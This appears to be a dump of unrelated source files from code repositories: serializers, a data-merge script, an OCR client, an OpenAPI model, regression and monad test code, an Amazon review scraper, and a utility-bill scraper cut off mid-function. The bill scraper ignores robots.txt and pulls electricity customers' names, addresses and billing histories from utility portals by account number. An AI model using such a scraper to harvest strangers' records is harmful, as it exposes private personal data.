5193b894f4cc698c3ac930f9f72b1f317437c348 | b1fe8054a20170b0484411eb2eae19ba820f2f77 | /nolsatu_courses/api/serializers.py | a1f903884ff09e5778efa897f3fccd91e3dfd70c | [] | no_license | nolsatuid/courses | 2d9be4ffac2651d63b8bb981b3280915109b6996 | df335cd7e8f3d08a44c4d0ce06f4989a89215189 | refs/heads/master | 2022-11-23T03:43:11.145131 | 2021-02-24T06:12:11 | 2021-02-24T06:12:11 | 145,433,826 | 0 | 1 | null | 2022-11-22T02:42:32 | 2018-08-20T15:12:03 | JavaScript | UTF-8 | Python | false | false | 350 | py | from rest_framework import serializers
class MessageSuccesSerializer(serializers.Serializer):
message = serializers.CharField()
class ErrorMessageSerializer(serializers.Serializer):
detail = serializers.CharField()
error_message = serializers.CharField()
message = serializers.CharField()
error_code = serializers.CharField()
| [
"irfan.pule2@gmail.com"
] | irfan.pule2@gmail.com |
287cfa5fca38192f022c1fdc9fd06ba73ef730a3 | 162e936cdbc362a18fa16e1d9579e8937671a13c | /dataMerge.py | 12b1b9bd95932866e6d1543e81fd4ff4e94f336c | [] | no_license | samanwayadas-creator/RNNnetworkRepo | 6b8c2ec2b3355c1fd52af1c79f5aeab3f31856f3 | 459bb79c41789030d989715ba1efd5ff7040cd59 | refs/heads/main | 2023-04-30T09:53:50.283073 | 2021-05-12T10:41:14 | 2021-05-12T10:41:14 | 366,680,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,126 | py | import glob as glob
import os
import numpy as np
from matplotlib import pyplot as plt
# from sklearn.gaussian_process import GaussianProcessRegressor
# from sklearn.gaussian_process.kernels import RBF, WhiteKernel, ConstantKernel as C
np.random.seed(1)
import pdb
import sys
import _pickle as pickle
if '/scratch/wz1219/FoV/' not in sys.path:
sys.path.insert(0, '/scratch/wz1219/FoV/')
from mycode.config import cfg
import math
dataset1_exp1 = pickle.load(open('/scratch/wz1219/FoV/data/exp_1_xyz.p','rb'))
dataset1_exp2 = pickle.load(open('/scratch/wz1219/FoV/data/exp_2_xyz.p','rb'))
#dataset2 = pickle.load(open('/scratch/wz1219/FoV/data/video_data_2018.p','rb'))
new_dataset = {}
video_num1 = 9
tester_num1 = 48
video_num2 = 19
tester_num2 = 57
video_num_new = 37
for video_ind in range(video_num1):
new_dataset[video_ind] = dataset1_exp1[video_ind]
for video_ind in range(video_num1):
new_dataset[video_ind+9] = dataset1_exp2[video_ind]
#for video_ind in range(video_num2):
# new_dataset[video_ind+18] = dataset2[video_ind]
pickle.dump(new_dataset,open('./data/tsinghua_merged_dataset.p','wb'))
| [
"75118243+samanwayadas-creator@users.noreply.github.com"
] | 75118243+samanwayadas-creator@users.noreply.github.com |
5a8809be90a32d25e83f3c8153b214a58ded97ae | 1944daa9a22b689fcdb7315a11aae4fc0b32a398 | /ctc/client.py | e6ddb1da72351cc7608dba4b30f34a36702483a0 | [] | no_license | fireae/OCR-methods-with-ctc-attention-and-transformer- | 1a90e04a4b879bda292dd553de53d27aa288d0f2 | 15dfd4cc23415533ddb76c29ec0c5d2f22f3646e | refs/heads/master | 2022-12-05T09:36:38.557132 | 2020-06-29T12:35:26 | 2020-06-29T12:35:26 | 299,661,567 | 1 | 0 | null | 2020-09-29T15:37:49 | 2020-09-29T15:37:48 | null | UTF-8 | Python | false | false | 3,943 | py | # -*- coding: utf-8 -*-
import sys, cv2
import requests
import urllib
import json
import time
import os
import glob
import re
import base64
import numpy
ft_path = '/data/notebooks/yuandaxing1/ft_lib/'
sys.path.append(ft_path)
import ft2
batch_size = 1
class SHOCR(object):
def __init__(self, server="gpu3ss.jx.shbt.qihoo.net", detection_port=9000, recongition_port=18866):
self.server = server
self.detection_port = detection_port
self.recongition_port = recongition_port
self.detect_url, self.reco_url = [
'http://%s:%d' % (self.server, self.detection_port),
'http://%s:%d' % (self.server, self.recongition_port),
]
def ocr(self, image_list):
'''
image list is opencv image list
'''
params = {'images' : []}
for idx, cur_image in enumerate(image_list):
params['images'].append({'name' : '%d.jpg' %(idx) ,
'content' : base64.b64encode(cv2.imencode('.png', cur_image)[1])})
beg = time.time()
rects = requests.post(self.detect_url, data = json.dumps(params), headers = {'content-type': 'application/json'}).json()
image_slice = []
for r, cur_image in zip(rects['result'], image_list):
for idx, b in enumerate(r['rect']):
sl = cur_image[ b[1]:b[3], b[0]:b[2]]
data = base64.b64encode(cv2.imencode('.jpg', sl)[1])
image_slice.append({'name' : 'slice%d.jpg' % (idx),
'content': data})
reg = requests.post(self.reco_url, data = json.dumps({'images' : image_slice}), headers = {'content-type': 'application/json'}).json()
reg_result, idx = reg['result'], 0
for r in rects['result']:
for box in r['rect']:
box.extend(reg_result[idx]['text'])
idx+=1
return rects
def Run(self, input_dir, output_dir):
if (not os.path.exists(output_dir)):
os.makedirs(output_dir)
self.ft = ft2.put_chinese_text(os.path.join(ft_path, 'msyh.ttf'))
image_list = glob.glob(os.path.join(input_dir, "*.jpg"))
for start in range(0, len(image_list), batch_size):
try:
cur_image_list = image_list[start :min(start+batch_size, len(image_list))]
l = [cv2.imread(image) for image in cur_image_list]
start = time.time()
ocr_result = self.ocr(l)
print('cost', (time.time() - start))
for image, result, name in zip(l, ocr_result['result'], cur_image_list):
cur_image = numpy.zeros(image.shape)
print(result['rect'])
for rect in result['rect']:
if not rect[5]: continue
cur_image = cv2.rectangle(cur_image,tuple(rect[0:2]), tuple(rect[2:4]),(0,255,0),1)
cur_image = self.ft.draw_text(cur_image, rect[0:2], rect[5], 15, (0, 255, 0))
new_name = os.path.join(output_dir, os.path.splitext(os.path.basename(name))[0]+"_debug.jpg")
cur_image = numpy.hstack((image, cur_image))
cv2.imwrite(new_name, cur_image)
json_name = os.path.splitext(new_name)[0]+".json"
f = open(json_name, "wb")
json.dump(ocr_result['result'], f)
f.close()
except Exception as e:
print(e)
if __name__ == "__main__":
ocr = SHOCR()
#ocr.Run('/data/notebooks/yuandaxing1/OCR/ocr_src', '/data/notebooks/yuandaxing1/OCR/ocr_src_test')
ocr.Run('/data/notebooks/yuandaxing1/OCR/text-detection-ctpn-master/testing/0608','/data/notebooks/yuandaxing1/OCR/text-detection-ctpn-master/testing/0608_test_result/')
#ocr.Run('/data/notebooks/yuandaxing1/OCR/CNN_LSTM_CTC_Tensorflow/test', './test')
| [
"shaunzhuyw@sina.com"
] | shaunzhuyw@sina.com |
ebb6925a2298d6d5c71e53537d3d15ee1d015735 | ff2e084d1bb347d16955fbdaa8e9f9d95bcb03e7 | /onepanel/core/api/models/token_wrapper.py | 4f86e905f13a1cff531909e013446e409db807b5 | [] | no_license | casualuser/python-sdk | 7db8969e93693c27fb7f7349cd8353ede54d2ed4 | 9d35ab476a9ba701a09d305bf5ae5af4ba9ed5a6 | refs/heads/master | 2022-09-15T15:18:39.672855 | 2020-05-25T22:15:22 | 2020-05-25T22:15:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,209 | py | # coding: utf-8
"""
Onepanel Core
Onepanel Core project API # noqa: E501
The version of the OpenAPI document: 1.0.0-beta1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from onepanel.core.api.configuration import Configuration
class TokenWrapper(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'token': 'str'
}
attribute_map = {
'token': 'token'
}
def __init__(self, token=None, local_vars_configuration=None): # noqa: E501
"""TokenWrapper - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._token = None
self.discriminator = None
if token is not None:
self.token = token
@property
def token(self):
"""Gets the token of this TokenWrapper. # noqa: E501
:return: The token of this TokenWrapper. # noqa: E501
:rtype: str
"""
return self._token
@token.setter
def token(self, token):
"""Sets the token of this TokenWrapper.
:param token: The token of this TokenWrapper. # noqa: E501
:type: str
"""
self._token = token
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TokenWrapper):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, TokenWrapper):
return True
return self.to_dict() != other.to_dict()
| [
"r@onepanel.io"
] | r@onepanel.io |
01c6727bbb55b58aaaf00926f80a814bb05f0768 | b854e106dbde2f83cbf07918b740bc21b5a37d16 | /SVR/main.py | 6adbba966a857b375687a72db6a0f364bd0f2518 | [] | no_license | hubertmucha/Machine | 772f4e37510dfda0b661ad41f56a1d0dfefd706b | 5240576af196c740dbd97ec70bac49fb49759d65 | refs/heads/master | 2022-04-11T15:35:47.408963 | 2020-04-11T11:10:41 | 2020-04-11T11:10:41 | 254,343,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#importing the data set
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:,1:2].values #matrix
y = dataset.iloc[:,2].values #vector
#scaling data
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
sc_y = StandardScaler()
X = sc_X.fit_transform(X)
y = sc_y.fit_transform(y.reshape(-1, 1))
#SVR
from sklearn.svm import SVR
regressorSVR = SVR(kernel='rbf')
regressorSVR.fit(X, y)
#y_pred =regressorSVR.predict([[6.5]])
#visualisation SVR regression
plt.scatter(X,y, color='blue')
plt.plot(X,regressorSVR.predict(X),color='green')
plt.title('Linear Regresion')
plt.show()
y_pred = regressorSVR.predict(sc_X.transform(np.array([[6.5]])))
y_pred = sc_y.inverse_transform(y_pred)
| [
"58261346+hubertmucha@users.noreply.github.com"
] | 58261346+hubertmucha@users.noreply.github.com |
b54170de518ce19a097475f091966db1fd82f864 | fd8e46371be27b51ef345dd8ee5a38cdcd2dfe49 | /tests/test_simplad_monad.py | adec7766ec627ac2755c10c21ca1ed4064860c04 | [
"MIT"
] | permissive | Cogmob/simplads | 1c029ba5474625cd20db46c5e28c194c97e0089d | 8731c4a02273109187cfe601058ce797e32ba1ae | refs/heads/master | 2020-12-28T04:32:56.982748 | 2016-11-04T17:36:51 | 2016-11-04T17:36:51 | 68,810,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,231 | py | from simplads.simplad_monad.simplad_base_helper import Bound
from compare import expect
from fn import F
from functools import partial
from nose.plugins.attrib import attr
from simplads.simplad_monad.namedtuples.bind_args import BindArgs
from simplads.simplad_monad.simplad_base_helper import WrappedDelta, Bound
from simplads.simplad_monad.simplad_monad import (
DeltaType,
SimpladMonad as SM,
SimpladResult)
from simplads.simplads.list_simplad import ListSimplad
from simplads.simplads.log_simplad import LogSimplad
from simplads.simplads.maybe_simplad import MaybeSimplad as MS, MaybeType
import unittest
def get_echo(i):
def f(j):
return i
return f
def echo(i):
return i
def add_delta_map(i):
return SimpladResult(value=i, delta_map={})
def add_customs(i):
return i, {}
class TestSimpladMonad(unittest.TestCase):
def test_fm(self):
func = SM.get_four()
expect(func).to_equal(4)
def test_unit_maybe(self):
add_simplads = SM.add_simplads({
's1': MS(),
's2': MS(),
's3': MS(),
's4': MS() })
order = SM.set_simplad_order(['s1','s2','s3','s4'])
sm = (F() >> add_simplads >> order)(SM.make())
res = SM.unit(sm)(4)
expect(res).to_equal(((((4, MaybeType.has_value), MaybeType.has_value),
MaybeType.has_value), MaybeType.has_value))
def test_unit_list(self):
add_simplads = SM.add_simplads({
'm1': MS(),
's1': ListSimplad(),
's2': ListSimplad(),
's3': ListSimplad(),
's4': ListSimplad(), })
order = SM.set_simplad_order(['s1','s2','s3','s4','m1'])
sm = (F() >> add_simplads >> order)(SM.make())
val = [[[[1,2]],[[1]]],[[[4]]]]
res = SM.unit(sm)(val)
expect(res).to_equal(
([([([([(1, MaybeType.has_value), (2, MaybeType.has_value)],
None)], None), ([([(1, MaybeType.has_value)], None)], None)],
None), ([([([(4, MaybeType.has_value)], None)], None)], None)],
None))
#@attr('s')
def test_box_four(a):
add_simplads = SM.add_simplads({
's1': ListSimplad(),
's2': ListSimplad(),
's3': ListSimplad(),
's4': ListSimplad()})
order = SM.set_simplad_order(['s4','s3','s2','s1'])
sm = (F() >> add_simplads >> order)(SM.make())
boxed = SM.get_box(sm)(lambda x: x)(
BindArgs(bound=SimpladResult(val=8,
delta_map={'s2': MaybeType.no_value}), deltas=[]))
expect(boxed).to_equal(
BindArgs(bound=8, deltas=[
WrappedDelta(type=DeltaType.default, delta=None),
WrappedDelta(type=DeltaType.configured,
delta=MaybeType.no_value),
WrappedDelta(type=DeltaType.default, delta=None),
WrappedDelta(type=DeltaType.default, delta=None)]))
def test_bind_maybe(self):
add_simplads = SM.add_simplads({
'1': MS(),
'2': MS(),
'3': MS(),
'4': MS(),
'5': MS()
})
order = SM.set_simplad_order(['1','2','3','4','5'])
sm = (F() >> add_simplads >> order)(SM.make())
val = 4
bound = SM.unit(sm)(val)
def double_simplad_result(i):
return SimpladResult(val=i*2, delta_map={})
bound = SM.bind(double_simplad_result)(
(sm, BindArgs(bound=bound, deltas=[])))
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
expect(bound[1].bound).to_equal(
Bound(unbound=Bound(unbound=Bound(unbound=Bound(unbound=Bound(
unbound=512,
annotation=MaybeType.has_value),
annotation=MaybeType.has_value),
annotation=MaybeType.has_value),
annotation=MaybeType.has_value),
annotation=MaybeType.has_value))
def test_bind_list(self):
add_simplads = SM.add_simplads({
'1': ListSimplad(),
'2': ListSimplad(),
'3': ListSimplad(),
'4': ListSimplad(),
'5': ListSimplad()})
order = SM.set_simplad_order(['1','2','3','4','5'])
sm = (F() >> add_simplads >> order)(SM.make())
val = [[[[[4]]]]]
bound = SM.unit(sm)(val)
def double_simplad_result(i):
return SimpladResult(val=i*2, delta_map={})
bound = SM.bind(double_simplad_result)(
(sm, BindArgs(bound=bound, deltas=[])))
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
expect(bound[1].bound).to_equal(
Bound(unbound=[Bound(unbound=[Bound(unbound=[Bound(unbound=[Bound(
unbound=[512],
annotation=None)],
annotation=None)],
annotation=None)],
annotation=None)],
annotation=None))
def test_bind_mixed(self):
add_simplads = SM.add_simplads({
'1': MS(),
'2': MS(),
'3': ListSimplad(),
'4': ListSimplad(),
'5': MS()
})
order = SM.set_simplad_order(['1','2','3','4','5'])
sm = (F() >> add_simplads >> order)(SM.make())
val = [[4]]
bound = SM.unit(sm)(val)
def double_simplad_result(i):
return SimpladResult(val=i*2, delta_map={})
bound = SM.bind(double_simplad_result)(
(sm, BindArgs(bound=bound, deltas=[])))
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
expect(bound[1].bound).to_equal(
Bound(unbound=Bound(unbound=Bound(unbound=[Bound(unbound=[Bound(
unbound=512,
annotation=MaybeType.has_value)],
annotation=None)],
annotation=None),
annotation=MaybeType.has_value),
annotation=MaybeType.has_value))
def test_bind_with_fail(self):
add_simplads = SM.add_simplads({
'1': MS(),
'2': MS(),
'3': ListSimplad(),
'4': ListSimplad(),
'5': MS()
})
order = SM.set_simplad_order(['1','2','3','4','5'])
sm = (F() >> add_simplads >> order)(SM.make())
val = [[4]]
bound = SM.unit(sm)(val)
def double_simplad_result(i):
return SimpladResult(val=i*2, delta_map={})
def double_simplad_result_fail_2(i):
return SimpladResult(val=i*2, delta_map={
'5': MaybeType.no_value
})
bound = SM.bind(double_simplad_result)(
(sm, BindArgs(bound=bound, deltas=[])))
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result_fail_2)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
expect(bound[1].bound).to_equal(Bound(unbound=None,
annotation=MaybeType.no_value))
# def test_bind_with_fail(self):
# add_simplads = SM.add_simplads({
# 's1': MS(),
# 's2': MS(),
# 's3': MS(),
# 's4': MS(),
# 's5': MS(),
# 's6': MS(),
# 's7': MS()
# })
# order = SM.set_simplad_order(['s7','s6','s5','s4','s3','s2','s1'])
#
# sm = (F() >> add_simplads >> order)(SM.make())
#
# unit = SM.unit(sm)
# bind = SM.bind(
# func = get_echo(Bound(unbound=8,
# annotation={'s2':MaybeType.no_value})))
#
# result = (F() >> unit >> add_deltas >> bind >> bind >> bind)(4)
# expect(result).to_equal(
# BindArgs(Bound(
# unbound=Bound(unbound=None, annotation=MaybeType.no_value),
# annotation=MaybeType.has_value), deltas=[]))
def test_pushing_simplad(self):
add_maybe = SM.push_simplad(simplad=MS())
add_log = SM.push_simplad(simplad=LogSimplad())
sm1 = (F() >> add_maybe >> add_maybe >> add_log)(SM.make())
add_simplads = SM.add_simplads({
'1': MS(),
'2': MS(),
'3': LogSimplad(),
})
order = SM.set_simplad_order(['1','2','3'])
sm2 = (F() >> add_simplads >> order)(SM.make())
expect(SM.unit(sm1)(4)).to_equal(SM.unit(sm2)(4))
# @attr('s')
# def test_pushing_simplad_bind(self):
# add_maybe = SM.push_simplad(simplad=MS())
# add_log = SM.push_simplad(simplad=LogSimplad())
# sm1 = (F() >> add_maybe >> add_maybe >> add_log)(SM.make())
#
# def box(sm):
# def f(i):
# return (sm, BindArgs(bound=i, deltas=[]))
# return f
#
# add_simplads = SM.add_simplads({
# '1': MS(),
# '2': MS(),
# '3': LogSimplad(),
# })
# order = SM.set_simplad_order(['1','2','3'])
# sm2 = (F() >> add_simplads >> order)(SM.make())
#
# bind1 = SM.bind(func = add_customs)
# bind2 = SM.bind(func = add_customs)
#
# binds1 = (F() >> SM.unit(sm1) >> box(sm1) >> bind1 >> bind1)(4)
# binds2 = (F() >> SM.unit(sm2) >> box(sm2) >> add_simplads >> bind2 >> bind2)(4)
#
# expect(binds1).to_equal(binds2)
| [
"luke.avery@live.co.uk"
] | luke.avery@live.co.uk |
73ad191df8f81ff1d0c4174bf2af5a3353083aa8 | 5068fd40502a09f3ba7d34de7e60b0d1e48a5f9e | /amazon.py | 0485295f776964f48e1696b85ec401125bbae1fc | [] | no_license | ishvaram/Python-connectors | 3fbb9246b443d4fc7bdc53256f5f8f7ab8d34f86 | 66079d1d0b80a06fe20beda9b9a475c07be4cf88 | refs/heads/master | 2021-01-18T23:59:47.447494 | 2017-11-27T07:24:40 | 2017-11-27T07:24:40 | 47,703,004 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,646 | py | import sys
import requests
import urllib2
import itertools
from bs4 import BeautifulSoup
pageNumber = 1
max_number = 133
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
for number in range(pageNumber, max_number + pageNumber):
url = opener.open("http://www.amazon.com/Apple-iPhone-16GB-Unlocked-Phone/product-reviews/B00NQGP42Y/ref=cm_cr_pr_btm_link_3?ie=UTF8&showViewpoints=1&sortBy=bySubmissionDateDescending&pageNumber="+str(number))
soup = BeautifulSoup(url)
# Review = soup.find('div', id='revMH').find('span','MHRHead').renderContents()
# Title = soup.find('div', id='revMHRL').find('span','a-size-base a-text-bold').renderContents()
# Author = soup.find('div', id='revMHRL').find('span','a-size-normal').find('a','noTextDecoration').renderContents()
# Rating = soup.find('div', id='revMHRL').find('div','a-icon-row a-spacing-none').find('a')['title']
Author = soup.findAll('div',id='cm_cr-review_list')
# Author[0].find('a','noTextDecoration')
print("")
print("<------- Title : ------->")
for a in Author:
names = a.findAll('a','a-size-base a-link-normal review-title a-color-base a-text-bold')
for name in names:
print("")
print name.renderContents()
# authors = a.findAll('a','a-size-base a-link-normal author')
# review = a.findAll('span','a-size-base review-text')
# date = a.findAll('span','a-size-base a-color-secondary review-date')
# rating = a.findAll('span','a-icon-alt')
# for name in names:
# print name.renderContents()
# for name1 in authors:
# print name1.renderContents()
# for name2 in review:
# print name2.renderContents()
# for name3 in date:
# print name3.renderContents()
# for name4 in rating:
# print name4.renderContents()
print("")
print("<------- Author : ------->")
for a in Author:
names = a.findAll('a','a-size-base a-link-normal author')
for name in names:
print("")
print name.renderContents()
print("")
print("<------- Review : ------->")
for a in Author:
names = a.findAll('span','a-size-base review-text')
for name in names:
print("")
print name.renderContents()
print("")
print("<------- Date : ------->")
for a in Author:
names = a.findAll('span','a-size-base a-color-secondary review-date')
for name in names:
print("")
print name.renderContents()
print("")
print("<------- Rating : ------->")
for a in Author:
names = a.findAll('span','a-icon-alt')
for name in names:
print("")
print name.renderContents()
print("")
# print("<------- Review Title : ------->")
# for x in Author:
# title = x.findAll('a','a-size-base a-link-normal review-title a-color-base a-text-bold')
# for finaltitle in title:
# print("")
# print finaltitle.renderContents()
# print("")
# print("<------- Review Content : ------->")
# for y in Author:
# review = y.findAll('span','MHRHead')
# for content in review:
# print("")
# print content.renderContents()
# print("")
# print("<------- Review Rating : ------->")
# for z in Author:
# rating = z.findAll('a')['title']
# for ratingfinal in rating:
# print("")
# print("")
# print("**************************** $$$ *******************")
# print("")
# print ("Title : "+ Title)
# print("")
# print ("Author Name : "+Author)
# print("")
# print ("Review Content: "+Review)
# print("")
# print ("Review Rating: "+Rating)
# print("")
| [
"jehovaram@gmail.com"
] | jehovaram@gmail.com |
64e17a5ea91aa627a5e99f11abecc085abf95e83 | e68cdc27c454f9af90354c9e3a45160453b6812c | /Scrapper.py | 71ecb49743d406c0bf6a9d859fec030ee89014a0 | [] | no_license | dirttech/UtilityScrapper | 73a240dd7154059794d63bbddbdf12dc778946ea | d9c408e3dabf94f977baeaaefdbfa39c8e53470c | refs/heads/master | 2021-01-01T05:37:25.529585 | 2014-06-03T14:43:21 | 2014-06-03T14:43:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,161 | py | __author__ = 'inderpal'
import urllib2
from bs4 import BeautifulSoup
import mechanize
import cookielib
import json
import datetime
import requests
import sys
now = datetime.datetime.now()
day = now.day
month = now.month
year = now.year
Name = ""
City = ""
LoadSanctioned = ""
LoadType = ""
PlaceType = ""
LoadConnected = ""
Address=""
District=""
Circle=""
BillCategory=""
def initBrowser():
br=mechanize.Browser()
cj=cookielib.LWPCookieJar()
br.set_handle_robots(False)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_equiv(True)
br.set_cookiejar(cj)
return br
def ScrapBSESDelhi(customerNo):
try:
br = initBrowser()
br.open('http://www.bsesdelhi.com/bsesdelhi/caVerification4Pay.do')
br.select_form(name='askForNumberBean')
br['txtCA_Number'] = customerNo
resp=br.submit()
soup = BeautifulSoup(br.response().read())
Name = soup.find("div", {"class": "txtCen"}).next.next.string
Address = soup.find("div", {"class": "tc2 fleft"}).next.next.next.next.next.string
elements = soup.find_all("div", {"class": "tc4 fleft"})
LoadSanctioned = elements[3].string
District = elements[13].string
PlaceType = elements[15].string
Circle = elements[9].string
td = soup.find_all("td")
BillReadings=[[0,0]]
BillReadings[0][0] = td[19].string
BillReadings[0][1] = float(td[28].string.replace(',', ''))
br.open('http://www.bsesdelhi.com/bsesdelhi/billHistory.do?caNumber=000'+customerNo)
soup=BeautifulSoup(br.response().read())
td=soup.find_all("td")
for i in range(2, 7, 1):
temp = td[7*i].string
val = float(td[7*i+3].string.replace(',', ''))
BillReadings.append([temp,val])
obj = {u"BillReadings": BillReadings, u"Name": Name[2:], u"Address": Address[2:], u"Sanctioned Load": LoadSanctioned, u"District": District, u"Circle": Circle, u"Place Type": PlaceType}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
return "error"
pass
def ScrapHaryanaBijliVitranNigam(customerNo):
try:
br = initBrowser()
br.open('http://202.56.120.172/elpsoftmis/WebPages/ConsumerInfoStart.aspx')
br.select_form(name='form1')
br['txtKNo'] = customerNo
resp=br.submit()
br.open('http://202.56.120.172/elpsoftmis/WebPages/ViewConsumerInfo.aspx')
soup = BeautifulSoup(br.response().read())
Name = soup.find("span", {"id": "lblName"}).string
City = soup.find("span", {"id": "lblCity"}).string
LoadSanctioned = soup.find("span", {"id": "lblLoadSanctioned"}).string
LoadType = soup.find("span", {"id": "lblLoadtype"}).string
PlaceType = soup.find("span", {"id": "lblBusinessName"}).string
LoadConnected = soup.find("span", {"id": "lblLoadConnected"}).string
BillCategory = soup.find("span", {"id": "lblCategory"}).string
br.open('http://202.56.120.172/elpsoftmis/WebPages/ConsumerDetails.aspx?value=3')
br.open('http://202.56.120.172/elpsoftmis/WebPages/BillingInformation.aspx')
soup = BeautifulSoup(br.response().read())
table = soup.find("table", {"style": "border-width:0px;width:749px;border-collapse:collapse;"})
tr = table.find_all("tr")
ct=0
EnergyReadings = [[0,0]]
for rows in tr:
td = rows.find_all("td")
if(ct == 9):
EnergyReadings[0][0] = td[0].text+" "+td[3].text
EnergyReadings[0][1] = float(td[21].text.replace(',', ''))
if(ct > 1):
try:
val = float(td[24].text.replace(',', ''))
EnergyReadings.append([td[3].text+" "+td[6].text, val])
except:
pass
ct = ct + 1
br.open('http://202.56.120.172/elpsoftmis/WebPages/ConsumerDetails.aspx?value=4')
br.open('http://202.56.120.172/elpsoftmis/WebPages/BillingInformation.aspx')
soup = BeautifulSoup(br.response().read())
table = soup.find("table", {"style": "border-width:0px;width:749px;border-collapse:collapse;"})
tr = table.find_all("tr")
ct=0
BillReadings = [[0,0]]
for rows in tr:
td = rows.find_all("td")
if(ct == 7):
try:
BillReadings[0][0] = td[6].text
BillReadings[0][1] = float(td[12].text)
except:
pass
if(ct > 7):
try:
BillReadings.append([td[6].text, float(td[12].text)])
except:
pass
ct = ct + 1
obj = {u"EnergyReadings": EnergyReadings, u"BillReadings": BillReadings, u"Name": Name, u"Load Sanctioned": LoadSanctioned, u"Load Type": LoadType, u"BillCategory": BillCategory, u"PlaceType": PlaceType, u"City": City, u"Load Connected": LoadConnected}
json_obj = json.dumps(obj)
br.close()
return json_obj
except Exception as e:
return "error"
pass
def ScrapSpancoNagpur(customerNo):
try:
br = initBrowser()
br.open('http://customercare.sndl.in/view_bill.aspx')
br.select_form(name='aspnetForm')
br['ctl00$cph$txtServiceNo'] = customerNo
resp=br.submit()
soup = BeautifulSoup(br.response().read())
tab = soup.find("table", {"id": "ctl00_cph_grdv_Bill_history"})
tr = tab.find_all("tr")
#print tr
EnergyReadings=[[0,0]]
ct=0
for rows in tr:
#print rows
td = rows.find_all("td")
if(ct == 1):
try:
EnergyReadings[0][0] = td[0].text
EnergyReadings[0][1] = float(td[1].text)
except:
pass
if(ct > 1):
try:
EnergyReadings.append([td[0].text, float(td[1].text)])
except:
pass
ct = ct + 1
br.open("http://customercare.sndl.in/frm_bill_print.aspx?serv_no="+customerNo+"&billmonth=Apr-2014")
soup = BeautifulSoup(br.response().read())
#print soup
Name = soup.find("span", {"id": "lbl_name"}).string
Address = soup.find("span", {"id": "lbl_address"}).string
LoadSanctioned = soup.find("span", {"id": "lbl_sancLoad"}).string
PlaceType = soup.find("span", {"id": "lbl_category"}).string
obj = {u"EnergyReadings": EnergyReadings, u"Name": Name, u"Address": Address, u"Sanctioned Load": LoadSanctioned, u"Place Type": PlaceType}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
return "error"
pass
def ScrapBestMumbai(customerNo):
try:
br = initBrowser()
br.open('https://www.bestundertaking.net/CUSTOMERBillInfo.aspx')
br.select_form(name='aspnetForm')
br['ctl00$Contentplaceholder2$ctl02$txtAccno'] = customerNo
resp=br.submit(name='ctl00$Contentplaceholder2$ctl02$btnGo', label='Go')
br.open('https://www.bestundertaking.net/CUSTOMERPaymentInfo.aspx')
soup = BeautifulSoup(br.response().read())
tab = soup.find("table", {"id": "ctl00_Contentplaceholder2_gvPaymentDetails"})
tr = tab.find_all("tr")
#print tr
BillReadings=[[0,0]]
ct=0
for rows in tr:
#print rows
td = rows.find_all("td")
if(ct == 1):
try:
BillReadings[0][0] = td[0].text
BillReadings[0][1] = float(td[1].text)
except:
pass
if(ct > 1):
try:
BillReadings.append([td[0].text, float(td[1].text)])
except:
pass
ct = ct + 1
br.open("https://www.bestundertaking.net/CUSTOMERHome.aspx")
soup = BeautifulSoup(br.response().read())
Name = soup.find("span", {"id": "ctl00_Contentplaceholder2_ctl02_LblCustName"}).string
Address = soup.find("span", {"id": "ctl00_Contentplaceholder2_ctl02_LblAddress"}).next.next.next
obj = {u"BillReadings": BillReadings, u"Name": Name, u"Address": Address}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
print e.__str__()
return "error"
pass
def ScrapMahaVitran(customerNo, locality):
try:
br = initBrowser()
